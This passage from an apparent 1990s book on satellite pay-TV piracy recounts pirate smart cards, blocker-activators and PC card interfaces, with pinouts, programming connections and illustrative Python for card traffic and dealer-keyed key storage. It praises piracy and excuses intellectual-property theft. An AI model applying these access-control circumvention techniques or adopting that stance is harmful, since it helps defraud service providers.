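        out["vpp_requested"] |= vpp
        out["events"].append(("card", bytes([pb]),
                              "ACK" + (" (turn on Vpp)" if vpp else "")))
        chunk = log[pos:pos + count]
        if len(chunk) < count:
            raise ValueError("log ends inside the data transfer")
        out["data"] += chunk
        remaining -= count
        pos += count
        out["events"].append((who_data, bytes(chunk), f"{count} data byte(s)"))
    if out["sw"] is None:
        raise ValueError("command did not end with a status word")
    out["data"] = bytes(out["data"])
    out["unparsed"] = bytes(log[pos:])
    return out


def render(exchange: dict) -> str:
    """The block view the text describes, one line per event."""
    return "\n".join(f"{who:<8}{data.hex(' ').upper():<26} {note}"
                     for who, data, note in exchange["events"])


# The exchange shown in the text: the decoder asks for the eight-byte decrypt
# key with instruction 78h; the card answers with the eight bytes, then 90 00.
KEY_REQUEST_LOG = bytes.fromhex("53 78 00 00 08 78 53 4B 59 20 48 41 43 4B 90 00")
# Constructed log (not from the book) using NULL and the single-byte ACK forms.
STEPWISE_LOG = bytes.fromhex("53 78 00 00 02 60 87 AA 86 BB 90 00")

if __name__ == "__main__":
    print(render(parse_t0_exchange(KEY_REQUEST_LOG)))
    print(render(parse_t0_exchange(STEPWISE_LOG)))
```

A monitor that parses this way can flag the things the text singles out: a CLA other than 53 on a VideoCrypt link, a card requesting Vpp through the INS+1 forms, and commands ending in one of the 6xh error words rather than 90 00.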
The Technology Of Piracy 


The Blackbox industry has always been innovation led. It has had to create 
pirate devices that operated in exactly the same way as the official devices. 
In some cases these devices gave better results than the official models. 
When smart cards came along the logical thing was to figure out a solution. 
One of the first announced hacks on the D-MAC EuroCrypt-M system used 
what amounted to one of the first pirate cards. However it took some time 
for that hack, the Card Tricks hack to reach the market. 


The first solution for the VideoCrypt hack was the KENtucky Fried Chip 
approach. This was where the smart card interface microcontroller of the 
official decoder was replaced with an 8752 that had a modified program 
containing the algorithm and keys for the 07 card. This meant that it did not 
require a smart card. It was the Holy Grail that hackers were looking for - a 
cardless Sky decoder. It was however very impractical. 


The hack required the official decoder to be opened, the 8052 to be 
removed and replaced with an 8752. It was a lot of work and people were 
not inclined to go for this hack. It was not user-friendly. Therefore it was not 
as commercially viable as most pirates desired. 


On a wet and gloomy Saturday afternoon, somewhere in Europe, the first 
pirate smart card for VideoCrypt 07 was fabricated. Based on the 
PIC16C54, it was to become famous as the Ho Lee Fook card. The 
PIC16C54 was emulating Sky's 07 smart card. Other versions followed 
including one based on an 8751 microcontroller but the PIC16C54 was 
initially the microcontroller of choice. 


The Card Tricks Card 


The first declared smart card hack on a smart card based system was the 
Card Tricks hack. Though it was announced late in 1992, it did not reach the 
market until 1993. It was perhaps a sign of things to come. When 
EuroCrypt-M fell, very few people, other than France Telecom and those in 
the companies using the system, were surprised. Instead there was a sense 
of wonder about why the hack took so long. The hack had been expected. 
After all, France Telecom had so generously facilitated this hack by having 
the system declared a European standard. And of course as a standard, it 
was possible to buy the full official specification of the system, less the 
crypto algorithm which was public knowledge anyway. 


It was not exactly thirty pieces of silver. In fact it was cheaper than that. 
There was no betrayal just a public revelation. As a hacker or a pirate, few 
things in this life come easy. France Telecom basically handed the details of 
their system to the hackers. As one hacker later commented when he had 
stopped laughing, "These are really not very bright guys. They gave us the 
specification and then they used a standard algorithm". 


[Diagram: Original Ho Lee Fook Card (1993) - PIC16C54 wired to the Smart 
Card Connector Pads (5V0, Gnd, Reset, Data, Clock).] 

The original Ho Lee Fook card (1993) used the PIC16C54 microcontroller. 
This was a 512x12 EPROM OTP version. The implementation of the initial 
Ho Lee Fook algorithm did not include the complete Hash checksum 
algorithm. Therefore Sky and News Datacom were easily able to ECM it by 
sending spoof 74h packets. The official cards rejected the spoof packets 
but the HLF cards did not. The PIC16C54 was replaced later in 1993 by the 
PIC16C84. The PIC16C84 was reprogrammable unlike the PIC16C54. 


[Diagram: The Card Tricks Card Using PIC16C57 (1992) - circuit diagram 
showing the PIC16C57 pinout (RTCC, -MCLR, OSC1, OSC2, Vdd, Vss, RA0 
to RA3, RB0, RB6, RC0 to RC7) and the Smart Card Connector Pads 
(Reset, Data, Clock, 0V Gnd, 5V0).] 

The design of the PCB on this card was innovative. The chip used in the 
design was recessed into a slot cut into the PCB. The reason for this was 
to reduce the maximum thickness of the card so that it would fit into some 
of the decoders. 

This is the circuit diagram for the original Card Tricks hack on EuroCrypt. It 
was based on the PIC16C57 microcontroller. This was effectively the first 
of the hacks on the EuroCrypt system. It was announced in 1992 but it did 
not make it to the market until 1993. It worked perfectly though it was 
ECMed by a key change. Over the last few months, some manufacturers 
have started to use the PIC16C57 again as it is more difficult to extract the 
code from this chip than the PIC16C84. 


The PCB layout of the Card Tricks card was unusual. The chip, a 
PIC16C57, was recessed into a slot cut into the board. The aim of this was 
to reduce the thickness of the card so that it would work in most decoders 
and IRDs. For the really tricky models, a longer PCB had to be 
manufactured but these were early days and this was the first hack. 


The Card Tricks hack worked well. Logically, the channels were a little bit 
upset and they changed their keys in order to ECM this card. Key changes 
were particularly problematic for this type of card. The PIC16C57 version 
used was an OTP type. This meant that it could not readily be 
reprogrammed. Though some areas of memory were reprogrammable, it 
would have created a major security risk to store new keys in this area. By 
the time of the ECM, there were other EuroCrypt-M pirate cards coming into 
the market. It was the beginning of the lingering death throes of EuroCrypt-M. 


The Ho Lee Fook Card 


The 8752 version of the Ho Lee Fook was never really a viable hack for the 
mass market. It involved too much hard work and was not user friendly. 
People were not keen on having their decoders modified. The solution was 
the Ho Lee Fook card. It was based on the PIC16C54. The version 
marketed used a one time programmable version of the PIC16C54. 


The PIC16C54 only lasted about three months in the market before the 
PIC16C84 began to replace it. The advantage of the PIC16C84 over the 
PIC16C54 was that it could be reprogrammed. This became a very 
important factor when Sky and News Datacom began to implement ECMs. 


The fact that the Ho Lee Fook card was in operation when Sky was 
launching the Multichannels package, did little to inspire confidence in the 
management of Sky and News Datacom. 


A few variations of the PIC16C84 card appeared. Mainly it was a case of a 
different pin being used for the Data line to the smart card connector pads. 


Towards the end of 1993, the frequency of ECMs was increasing along with 
the desperation of News Datacom. The hackers were winning the war. 
While Sky and News Datacom might have some temporary victory with an 
ECM it rarely lasted for more than a few days. The hackers were able to 
reprogram the cards. After a while, some pirates added an EEPROM to the 
card so that the ECM codes could be stored and selected by the card user. 
The selection method was via a touch pad. 


[Diagram: Original PIC16C84 Smart Card Emulator (VC 07) - PIC16C84 
pinout (RA0 to RA3, RTCC/RA4, -MCLR/Vpp, OSC1, OSC2, Vdd, Vss, RB0 
to RB7) wired to the Smart Card Connector Pads (Vcc, Data, Clock, 0V, 
Reset).] 

[Diagram: Variant Of Original PIC16C84 Smart Card Emulator (VC 07) - 
the same layout with a different PIC pin used for the Data pad.] 


The Season Interface 


In the Spring of 1994, the Season program was developed by Markus Kuhn. 
This program allowed the PC to emulate an official Sky card. The PC serial 
port was interfaced to the decoder via what has now become known as a 
SEASON interface. 


This interface is based on the MAX232 RS232-TTL level converter chip. 
This chip converts the data flowing between the PC and decoder to levels 
that the RS232 serial port and the TTL card interface on decoder can each 
handle. 


This is the cornerstone of the PC emulator market. There are a number of 
commercial models of the interface on the market. They all seem to use the 
basic interface design but tend to call it different names. 


The beauty of this interface is that it is simple to fabricate. It also works on 
most computers with a serial interface. The same interface will also work on 
an Apple MAC with the proper connecting cable. 


At present there are no working Season type hacks for the VideoCrypt Sky 
10 card issue, (0A). The version of VideoCrypt used by the Adult Channel 
and Eurotica is totally compromised and the Voyager program, the best 
available PC emulator program decrypts the Adult Channel, Eurotica and 
most of the D2-MAC EuroCrypt channels. 


The Phoenix Interface 


The Phoenix interface is a direct development of the Season interface. It 
allows the PC serial port to emulate a VideoCrypt decoder with the relevant 
software. The PC can then send and receive packets. 


The primary differences between the Phoenix interface and the Season 
interface are that the RESET line is controlled by the PC in the Phoenix 
interface and the Phoenix interface also has a crystal oscillator to supply the 
card with the clock signal. Pull-up resistors are also used on the card 
connections. 


An American version of the Phoenix interface currently being used with the 
DSS Phoenix program does not use a level converter and connects the card 
directly to the serial port. It has a 74HC00 based oscillator to supply the card 
clock signal. 
[Diagram: Phoenix Interface (ISO Smart Card Programmer) - serial port 
connector, 74HC04 and 7407 buffers, crystal oscillator and Smart Card 
Socket. Both connectors shown are female ... back of the connector.] 

Vcc and Gnd connections for 74HC04 and 7407 are not shown. All unused 
inputs on these chips are grounded. The 10 Ohm resistors on the card 
socket connections are protection resistors. The crystal used is a standard 
NTSC colour subcarrier crystal. 
D2-MAC EuroCrypt Cards 


The development of pirate EuroCrypt cards only started with the PIC16C57. 
The reason that the PIC16C57 was selected initially was that it had a 
greater capacity than the PIC16C54. The knowledge of the PicBuster was 
not widespread. The risk of ECMs meant that any solution had to be easily 
reprogrammed. The result was the twin PIC16C84 D2-MAC cards. 


These cards were intended to be reprogrammed using the serial 
programming mode. As a result they used the full smart card connector pad 
array. Ordinarily most cards only used five of these pads with Vpp not 
connected. The two lower pads were connected to the RB7 pins on the 
PICs. This allowed each PIC to be selected individually for programming. 


The reprogramming of these cards can be carried out easily with PIC 
programmers like the Henk Schaer programmer or the David Tait 
programmer. It requires a card socket which can be configured. For 
experimental purposes, most hackers tend to use a card socket recycled 
from a Genesis blocker. Wires soldered to the relevant pins can then be 
connected to the PIC programmer. 


The initial designs used touch pads. These pads allowed the card user to 
switch between keys on channels. The initial designs were commercial 
ones. Later when the PicBuster information was distributed, other versions 
of these cards were manufactured. The other versions did not have the 
touch pads as the programming skills and knowledge of the hackers and 
pirates had advanced sufficiently to make the cards more updatable. 


With the growing knowledge of how the EuroCrypt-M and EuroCrypt-S 
systems operated, hackers were able to streamline the code so that the 
essential routines could be included in a single PIC16C84. This was 
achieved mainly by optimising the implementation of the DES algorithm and 
by removing non-critical routines. This is perhaps why most single PIC 
implementations do not have any fancy display routines. 


As these cards are reprogrammable, they remain in continual use. There 
has been a trend recently for some pirates to offer reprogramming facilities 
for these cards. Since with the basic implementation of the D2-MAC 
EuroCrypt code there is no need for the second PIC16C84 it is removed 
and recycled. 
[Diagram: Twin PIC D2-MAC With Touch Pads - two PIC16C84s with their 
RB6, RB7, Vdd and Vss pins wired to the Smart Card Connector Pads (5V0, 
Data, Clock, 0V Gnd, Reset, Vprog 1, Vprog 2, Vpp (Not Used)).] 


This is a commercial version that used touch pads to switch between key 
sets. This card can be reprogrammed in serial mode. The chips are 
programmed individually by selecting the relevant RB7 (pin 13). These pins 
are connected to the two normally unused pads on the smart card pad 
array. The smart card pad connections are shown in the diagram. 


Serial Mode Programming Connections: 

PIC             Smartcard Pads 
Pin 13 (RB7)    Data 
Pin 12 (RB6)    Clock 
Pin 14 (Vdd)    5V0 
Pin 5 (Vss)     0V Gnd 
Blockers And Activators 


The Sky 09 card issue was a complete disaster for Sky and News Datacom. 
It was not only the fact that it was totally compromised, other things led to a 
total loss of system integrity. The most important of these was the 
Blocker/Activator. It alone was responsible for Sky and News Datacom 
losing control of their own access control system. 


The Blocker/Activator was based on the Phoenix program. Initially the 
Phoenix program was used to activate the cards and then the pirate 
customer was given a blocker. The blocker would check the Sky 
datastream for a kill packet with the card's serial number in it. If it found 
such a packet then it would stop it getting to the card. The theory of the 
blocker was based on an earlier hack, that of the KENtucky Fried Chip. 


However the success of the Blockers and activated cards could be seen 
from the over the air kill figures that some of the hackers had been 
monitoring. In the last quarter of 1994, Sky tried to kill almost One Million 
cards. Most of these cards had been used in blockers and activators. 
Quickstart Sky cards were being traded among pirates for £60 each. 


With the sheer volume of official cards that had to be modified, the idea of 
having the activator program, Phoenix, and the blockers as separate items 
became unfeasible. The solution was the combined blocker - activator. 


The combined device was mass produced. It had many names; Lazarus, 
Genesis, Gemini and SunBlocker were the most common. The circuit and 
PCB pattern given here are those of the Lazarus device. Other variants can 
be found on the usual internet sites and BBSes. 


Sky and News Datacom did manage to come up with an ECM that 
effectively rendered this particular hack void. It was using the 
nanocommands, commands hidden in the authorisation packet that looked 
to the blocker just like serial numbers. As a result the blocker let them 
through to the card with dire consequences. However by the time that this 
ECM was properly implemented, the first stable 09 pirate cards were hitting 
the market. 


Though there have been rumours of blockers for the Sky 10 card, there is 
no confirmation yet that such devices exist. It is also expected that this form 
of device will be used on DSS. 
[Diagram: Lazarus / Genesis Activator-Blocker - circuit and PCB pattern, 
with a Socket Switch (Switch Open - Card Present).] 


Label text on the Lazarus: 

LAZARUS 
Instructions For Use:- 
Insert Viewing Card into Lazarus. 
Insert Lazarus into Decoder. 
Press Decoder Authorise Button to Upgrade Viewing Card. 
Ensure Card remains in Lazarus to prevent Card de-activation. 
The Sky 09 PIC16C84 Pirate Cards 


News Datacom had learned the lessons of the 07 well. The 09 card was a 
great improvement on the 07. The algorithm was different and the new card 
was vastly more complex in operation. However that did not stop the 
hackers and pirates from trying. 


Apparently News Datacom had decided to include what is acknowledged to 
be a very dangerous element in any system - the capability for over the air 
reprogramming of the smart card. Of course there were some very good 
reasons for this. The VideoCrypt system was groaning under the load of 
new subscribers. Originally, it seems that it was not envisaged that 
VideoCrypt would be handling upwards of two million subscribers. 
Therefore some method of making the card more controllable and 
accessible to the subscription management system was required. In 
addition to this, the facility of nuking any pirate devices was required. 


News Datacom also went one step beyond safe. They made the whole 
address space of the card readable as input data for their hash algorithm. 
The initial result of this was that each pirate smart card had to have an 
image of the official Sky card to use for the hashing algorithm. This was to 
prove the downfall of the 09 card. Once the hackers had a basic 
implementation of the hash function and checksumming, a knowledge of a 
few of the nanocommands and a Phoenix interface, it was possible to read 
the address space of the Sky card. The hack was called the Vampire Hack. 


The pirate cards that first appeared had two PIC16C84s and a 24C65. The 
later more stable models that appeared in November 1994 had a single 
PIC16C84 and a single 24C65. The 24C65 held the image of the Sky card 
memory. 


What followed was the complete collapse of the Sky subscriber 
management system. This can, in part, be attributed to the fact that the 
information for hacking the 09 was so widely available that anyone could 
get the source code or a PC Season type emulator or indeed the source 
code for the PIC cards on the internet and BBSes. 


Though the circuits given here are the most common, there were subtle 
variations where different ports on the PIC16C84 were used for the data 
connection. When Sky switched to the 10 card on 31/10/1995 after almost a 
year of total piracy, the pirate 09 cards were converted to D2-MAC cards. 
[Diagram: PIC16C84 Initial VC 09 Design With 24C65 (Circa Oct 1994).] 


COP8782 - Another One Bytes The Dust 


The days around the 28th September 1995 were chaos for the European 
Blackbox industry. FilmNet, TV1000 and the TV3s changed their keys. 


Pirate cards based on the PIC16C84 just did not work any more. The 
battery cards were updated within a few hours but the vast majority of pirate 
viewers were left without a picture. It was a momentary success for FilmNet 
and TV1000. All of the viewers using the MACcess emulators were hit also. 


A few days after this ECM new cards appeared. These new cards were 
capable of decoding FilmNet and TV1000 and the other D2-MAC 
EuroCrypt-M channels. They were based on a National Semiconductor 
COP8782 microcontroller and a 24C16 EEPROM. It was the first time that 
this particular chip had been used in any great quantity in the UK. It had 
previously been widely used in the Scandinavian region. 


Chaos is nothing new to the Blackbox industry. When a code change or 
ECM takes place there is a mad dash for the solution. The situation with the 
FilmNet/TV1000 key change has been no different. In an effort to protect 
the investment, some pirate card vendors switched to a new 
microcontroller. The objective was clear - recover the initial investment and 
delay a proliferation of the new code for as long as possible. 


The whole basis of an ECM solution is that it trickles down. At first only a 
few companies get hold of the new code. The new code is then sold on 
down the line to the dealers. The flaw with this was that the new code was 
placed in the insecure PIC16C84 chips and there was no real means of 
controlling distribution once the code was popped from this chip. The 
COP8782, however, was meant to be different. 


While the D2-MAC codes were freely available, the COP card was not a 
large enough target to interest hackers. Once it became clear that apart 
from the battery cards, this was the only chip available with the codes, it 
became a major target. 


Now it is just another "secure microcontroller" that was popped in the search 
for FilmNet and TV1000 codes. The latest in the range of pirate smart 
cards, the COP8782 based card has become another addition to the list of 
chips popped by the Blackbox industry. National Semiconductor have 
apparently introduced some modifications to the COP8782 chips that will 
make them harder to pop in the future. 


Essentially the pirate COP8782 chip carries the main program and a 
small decryption routine. The new key codes are held in encrypted format in 
the EEPROM. Rather than try and decrypt the EEPROM contents, the 
COP8782 was targeted. The attempt was successful. 


[Figure: The Millenium 12 COP Card - Based On The COP8782. Circuit with a 
COP8782 microcontroller and a 24LC16B EEPROM; the card contacts shown are 
Data, Reset, 0V Gnd and Clock.] 


The COP Card was an attempt at imposing some form of order on the pirate 
card market. It was perhaps more innovative than the Battery Card in that it 
allowed for dealer specific updates. The card included a routine to decrypt 
the contents of the EEPROM. Thus one dealer's upgrade would not work in 
another dealer's card. The COP8782 based card was intended to be more 
secure than the preceding PIC16C84 cards. However the COP8782 was 
popped. 


The move to the COP8782 was significant in that it was applying secure key 
distribution techniques to a chaotic market. The contents of the EEPROM 
were encrypted with a DES-like algorithm. The decryption key was dealer 
specific. This meant that an EEPROM upgrade for one dealer would not 
work in another dealer's cards. 
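As an added illustration (not code from the book or from any card), the following Python model shows the dealer-keyed update scheme just described: the dealer key lives in the chip, the key table ships encrypted in the EEPROM, and an image built for one dealer is rejected by another dealer's card. The page does not specify the DES-like cipher, so an HMAC-SHA256 counter-mode stream plus tag stands in for it; the EEPROM layout, dealer secrets and channel key values are constructed for the model.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed EEPROM layout for this model: each table entry is an 8-byte
# channel label followed by an 8-byte key; the image is nonce | ct | tag.
ENTRY_LEN = 16
NONCE_LEN = 16
TAG_LEN = 32


def _keystream(dealer_key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256.

    Stand-in for the DES-like routine the book places inside the COP8782;
    the page does not specify that algorithm.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(dealer_key, block, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def build_eeprom_image(dealer_key: bytes, channel_keys: Dict[str, bytes]) -> bytes:
    """Dealer side: encrypt a key table for one dealer's cards.

    The dealer key enters both the keystream and the tag, so the image is
    bound to that dealer: a card holding a different dealer key rejects it.
    Labels are at most 8 ASCII characters in this constructed layout.
    """
    table = b"".join(
        name.encode("ascii").ljust(8, b"\0") + key
        for name, key in sorted(channel_keys.items())
    )
    nonce = os.urandom(NONCE_LEN)
    stream = _keystream(dealer_key, nonce, len(table))
    ct = bytes(p ^ k for p, k in zip(table, stream))
    tag = hmac.new(dealer_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def card_load_keys(dealer_key: bytes, image: bytes) -> Optional[Dict[str, bytes]]:
    """Card side: the on-chip routine that decrypts the EEPROM at power-up.

    Returns the key table, or None when the image was not built for this
    dealer key or has been altered (checked before anything is decrypted).
    """
    if len(image) < NONCE_LEN + TAG_LEN:
        return None
    nonce = image[:NONCE_LEN]
    ct = image[NONCE_LEN:-TAG_LEN]
    tag = image[-TAG_LEN:]
    expected = hmac.new(dealer_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    stream = _keystream(dealer_key, nonce, len(ct))
    table = bytes(c ^ k for c, k in zip(ct, stream))
    if len(table) % ENTRY_LEN:
        return None
    keys = {}
    for off in range(0, len(table), ENTRY_LEN):
        label = table[off:off + 8].rstrip(b"\0").decode("ascii")
        keys[label] = table[off + 8:off + ENTRY_LEN]
    return keys


def cross_dealer_check() -> Dict[str, bool]:
    """Exercise the properties the book attributes to the scheme.

    A card with the matching dealer key loads the table, another dealer's
    card rejects the same image, and an altered image is rejected. Dealer
    secrets and channel key values are constructed for the model.
    """
    dealer_a = hashlib.sha256(b"constructed secret of dealer A").digest()[:16]
    dealer_b = hashlib.sha256(b"constructed secret of dealer B").digest()[:16]
    new_keys = {"FILMNET": bytes(range(8)), "TV1000": bytes(range(8, 16))}
    image_a = build_eeprom_image(dealer_a, new_keys)
    tampered = bytearray(image_a)
    tampered[NONCE_LEN] ^= 0x01  # flip one ciphertext bit
    # Flip side of the design: every card from one dealer holds the same
    # secret, so the scheme is only as strong as the chip's ability to keep
    # it, which is exactly where the COP8782 failed.
    return {
        "own_card_accepts": card_load_keys(dealer_a, image_a) == new_keys,
        "other_dealer_card_rejects": card_load_keys(dealer_b, image_a) is None,
        "tampered_image_rejects": card_load_keys(dealer_a, bytes(tampered)) is None,
    }
```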


The fact that this type of hack is possible gives some view of how 
completely the D2-MAC EuroCrypt system is compromised. Ordinarily a 
system should be capable of using Electronic CounterMeasures (ECMs). In 
fact the best example of this was the VideoCrypt 09 system. The best 
analogy for the 09 VideoCrypt card when it was compromised was a 
cornered rat - extremely dangerous and very unpredictable. News Datacom 
were able to implement some very nasty ECMs including one that wiped a 
section of memory in one of the pirate battery cards. However the D2-MAC 
EuroCrypt system seems to have none of the elegance and resilience of 
VideoCrypt. The designers of EuroCrypt seem never to have contemplated 
the possibility of the cards being hacked. As a result, the ECMs seem to be 
limited to key changes. Of course, thanks to the specifications being 
published, the hackers and pirates have an almost complete understanding 
of the system. 


The COP8782 is an unusual choice as a microcontroller. The type used was 
the OTP version and therefore it could not be reprogrammed. The reason 
for this choice seems to have been partly that it was a more secure chip 
than the PIC16C84 and partly because the only thing that pirate EuroCrypt 
cards had to cope with was key changes. 


Changing the keys on the COP cards is simply a case of reprogramming the 
EEPROMs. Of course it does require that the new keys have been 
encrypted with the dealer key used in the COP8782 on the card. The 
reprogramming can be carried out using a PIC16C84 programmer. The 
programs for programming the 24C16 and 24C65 EEPROMs are widely 
available on the internet and specialist BBSes. 
Battery Cards 


The pirate market in Europe is an internecine one. Pirates prey upon other 
pirate designs. As a result of this, the larger pirates moved to a more secure 
microcontroller. The move away from the PIC16C84, which had been the 
foundation of the pirate smart card industry, was long overdue. 


The secure microcontroller chosen was the Dallas 5002FP. This chip is an 
8051 type microcontroller but it has some security elements that made it far 
more secure than even the smart cards used by the channels in Europe. 


The address bus and the data in the chip are encrypted with what is 
believed to be a DES-like algorithm. Whereas with some 8051 microcontrollers 
the code could easily be popped by spoofing the microcontroller, the 
Dallas 5002FP does not seem to have that problem. 


The main battery cards used in Europe, (dealt with in greater depth in 
Chapter 7), use a largely similar design with a Dallas 5002FP with two 32K 
RAM chips. 


A later design, the Cardtronics AO Amiga uses a 128 K RAM. The Megatek 
and Cardtronics models were upgraded to emulate the Sky 10 card. It 
required an additional ASIC board to emulate the ASIC in the official Sky 
card. 


The European battery cards have key pads. This means that the card user 
can enter the update codes into the card manually via the on-card keyboard 
or, as in a later innovation, via the remote control. The evolution of the 
battery card in the US seems to have little in common with the European 
situation. 


The initial pirate DSS battery card was based on the Dallas 5002FP. There 
appeared to be some sort of split among the designers of the original 
battery card. The result was that a number of designs appeared on the 
market. Some of the newer variants did not use the Dallas 5002FP. One of 
the rumours about this was that the DirecTv and News Datacom security 
people were monitoring sales of the Dallas 5002FP. However a more 
plausible reason for the change is that the European pirates were buying 
most of the Dallas 5002FP chips. The circuit given here is that of one of the 
newer DSS battery card variants. It uses the Dallas 5000T and an ATMEL 
AT89C51 microcontroller. Programming is by means of an edge connector. 
The MK8 - A Commercial Interface 


The MK8 by Paul Maxwell-King is perhaps one of the best examples of how 
the Season Interface, the Phoenix Interface and a PIC programmer can be 
integrated. The software for using the device is freely available on the 
internet and the specialist BBSes. The design files for the interface, some of 
which are reproduced here, are also available on Paul Maxwell-King's 
WWW site (http://www.gpl.net/paulmax). The interface can be purchased 
ready built as interface/controller/programmer or as the interface only. It is 
also possible to purchase the PCB only. Ordering details are below. 





If you want to order the interface my email address is paul@maxking.demon.co.uk 

PLEASE MAKE SURE YOU INCLUDE YOUR EMAIL ADDRESS! 

Or send cheque, cash, bankers draft or postal order. (All above must be in 
Sterling.) Cash payment, bankers draft or Postal order allows us to despatch 
order IMMEDIATELY. Cheques will normally take 5 Days before despatch. 

1 Halmshaw Terrace, 
Bentley, 
Doncaster, 
South Yorkshire, 
England. 
DN5 0BD. 

Make payment payable to Paul Maxwell-King. 

On receipt of payment I will send the items First Class post. If you require 
an Invoice please state that in your snail mail to me. Please remember with 
an Invoice, your name and address will then be on our account records. 
Please enclose details of package i.e. 

Card reader and PIC/interface/Programmer/emulator 50 UK pounds 
Interface only 25 UK pounds 
Printed Circuit Board only 10 UK pounds 

Don't forget YOUR RETURN ADDRESS, it would also be nice to have 
your telephone number for any problems. 

It's also advisable to include your email address if possible. 

DON'T FORGET: ANY MORE THAN 3 METERS OF CABLE PLEASE 
ADD AN EXTRA £5.00 FOR ANY LENGTH ABOVE 3 METERS. SO IF 
YOU REQUIRE 5 METERS IT WILL BE £5.00 EXTRA 

**** POSTAGE IS INCLUDED IN THE PRICE **** 
The PIC chip is on the underside of the PCB. The single PIC chip uses: 
Pin 4 for Reset 
Pin 5 for GND (0V) 
Pin 12 (RB6) for Clock 
Pin 13 (RB7) for Data 
Pin 14 for VDD (5V) 


[Figure: ISO 7816 & PIC Programmer/Reader + PIC Card + PC Interface - the 
MK8 PCB. Card contacts shown: 0 Volt, Reset, Clock, bidirectional Data at 
9600. Total length from edge to components 92.5mm; the length of an ISO 
7816 chip card is 85.60mm. Top view of pcb showing layout of components.] 


[Figure: MK8 switch functions and parts list. Switches: Reset from card to 
decoder (on/off); Reset from card to pin 9 of the MAX232 IC (on/off); pin 7 
of the RS232 socket to pin 8 of the MAX232 IC (on/off); 5 Volt power to 
oscillator and card reader (SC1)/programmer. Parts (RS stock numbers and 
prices are given in the original): oscillator module with outputs of 
14.31818, 7.15909, 3.579545 and 1.789772 MHz and 894.88, 447.44, 223.72, 
111.860 and 55.930 KHz; MAX232 RS232 interface for a single +5 volt 
supply; standard TTL logic IC; fixed 5V 50mA regulator in TO92 package; 
3mm 5 Volt LED with integral resistor; smart card connector SC1 with 16 
contacts covering up to 8 connection pads and a normally closed card 
detection switch; 22K, 2.2K and 10K resistors; 8, 14 and 16 way DIL 
sockets; RS232 9 pin D socket and hood; PIC16C84; 3 meter length of 5 core 
cable; pin-strip header and jumper links. RS232 lead colour table (Red, 
Black, Yellow, Blue; RXD receive on pin 2). This ISO device is long enough 
to fit into a Pace MSS1000 satellite decoder.] 
5: The Information Wars 





The time just prior to the Renaissance must have been a lovely time 
for those in the Church. They, the hierarchy, controlled the flow of 
information. They stated God’s truth as they saw it and it was Law. 
No questions asked. 


Actually, “no questions asked” was more of an order. Anyone who 
did ask was dealt with quickly and, in most cases, finally. The 
society was based on a pyramid with the information providers at the 
top. 


It was pyramidal because in addition to the information, those at the 
top also controlled the means of production. Books and other 
publications were produced by a long and specialised process of 
copying. Then movable typeface was created by Johannes Gutenberg. 


The means of production of information was taken from those who 
had held sway and they never again regained that control. Information 
spread like wildfire. The fools even tried to ban books, which 
only had the effect of making them more sought after. 


Solidly held beliefs were questioned and smashed with facts. 
Simpleton lies designed to keep people subdued were seen as such. 


Gutenberg's creation was stolen from him by a greedy creditor and a 
bunch of conniving lawyers. Gutenberg saw little if any of the 
profits from his creation and yet the bibles produced with his 
printing process were still called Gutenberg bibles. They even stole 
his name but history only remembers Gutenberg. 


One of the greatest revolutions in Human knowledge was based on 
the theft of intellectual property. 


The analogy may not be perfect. It may not even be totally accurate 
in places but it does illustrate two things perfectly: 


1. A monopoly on information is not indefinitely possible. 


2. All systems eventually break down. 
Information Acquisition 


To the uninitiated, hackers seem to be able to lift information about systems 
by magic. Marketing executives are particularly prone to this sort of 
paranoia, especially when they begin to believe their own advertising copy. 
About ninety eight per cent of the information required to hack a system is 
freely available. It is simply a question of knowing what to look for. 


The best place to hide something is in plain sight. This is a good example of 
lateral thinking. The searcher will be looking for something that is hidden 
and since the thing is not hidden he will not find it. Most of the time this line 
of thought appears to work. 


It has been said that electronics is merely a set of modules. Electronic 
engineering is knowing how to interface these modules. Hacking involves 
being able to take the modules apart and then put them back together. 


Continuing this line of thought, a scrambling system is an arrangement of 
modules that produces a specified output from a known input. Most 
systems designers will use a tried and tested module rather than developing 
a new one. With totally new circuitry the business people in the company will 
try to have the design patented. In doing so they provide the hacker with an 
easily accessible source of information. The companies often try to protect 
themselves by reducing the circuit to IC level. The hacker has the 
advantage of knowing that the development work was carried out using 
discrete circuitry or at least off-the-shelf componentry. 


In hacking, information is the most valuable commodity. Strangely for such 
a valuable commodity it is often badly protected. The actual term "Information 
Acquisition" is a catch all phrase. It basically covers information 
gathering, analysis, and no small bit of wizardry. 


In order to acquire information, it is best to know where it lies. There are 
basically three types of information: published, electronic and holistic. 
Ideally every piece of obtainable information on a system should be 
considered when assessing the security of that system. Basically the holistic 
approach is putting everything together, even the things that do not initially 
make sense. It is in reality a filtering process that will result in a valuable 
insight. 


Perhaps it is best described as a quest for information. Whether or not this 
information immediately makes sense is irrelevant. Sooner or later it will. 
The channels and the manufacturers will fight to keep this information 
secret. 
Published Information Sources 


Published information is that derived from the technical and non-technical 
media. The brochures from the system manufacturers are also in this 
category. While the information in the technical and trade magazines is 
generally accurate there are a few journalists who are more a liability than 
an asset as an information source. These journalists tend to work for the 
advertorial and social studies magazines. 


In satellite television and scrambling in Europe, there are basically a few 
magazines and newsletters that are essential. The first aperiodical newsletter 
is obviously Hack Watch News. This is the only newsletter on signal 
security in Europe. It is, to paraphrase the MAD motto, “First in a field of one.” 


“What Satellite” is perhaps one of the best gauges of the public perception 
of satellite television. It is a glossy magazine aimed at a general readership. 
The equipment reviews are good, though they have minimal technical content. 
Of late there have been a few good technically orientated articles. The news 
is generally culled from other sources but the strong point of the magazine 
is that it frequently carries excellent articles on programming. There is also 
a good column on satellite television DXing by Roger Bunney and readers 
constantly send in details and photographs of the weird and wonderful feeds 
that they have encountered. It is also the only UK satellite television 
magazine that has a WWW site. This fact alone puts it head and shoulders 
above its competitors. 


“Television” magazine is the UK’s leading magazine on television technology. 
It is read by most television engineers and technicians in Ireland and 
the UK. It is one of the most highly regarded magazines on the subject. 
Although it does not cover signal security, it does cover satellite television 
technology in addition to that of VCRs and other domestic electronics. It 
also has the longest running column on long distance TV reception by 
Roger Bunney which also covers unusual satellite television traffic. 


There are of course other magazines covering the business side of satellite 
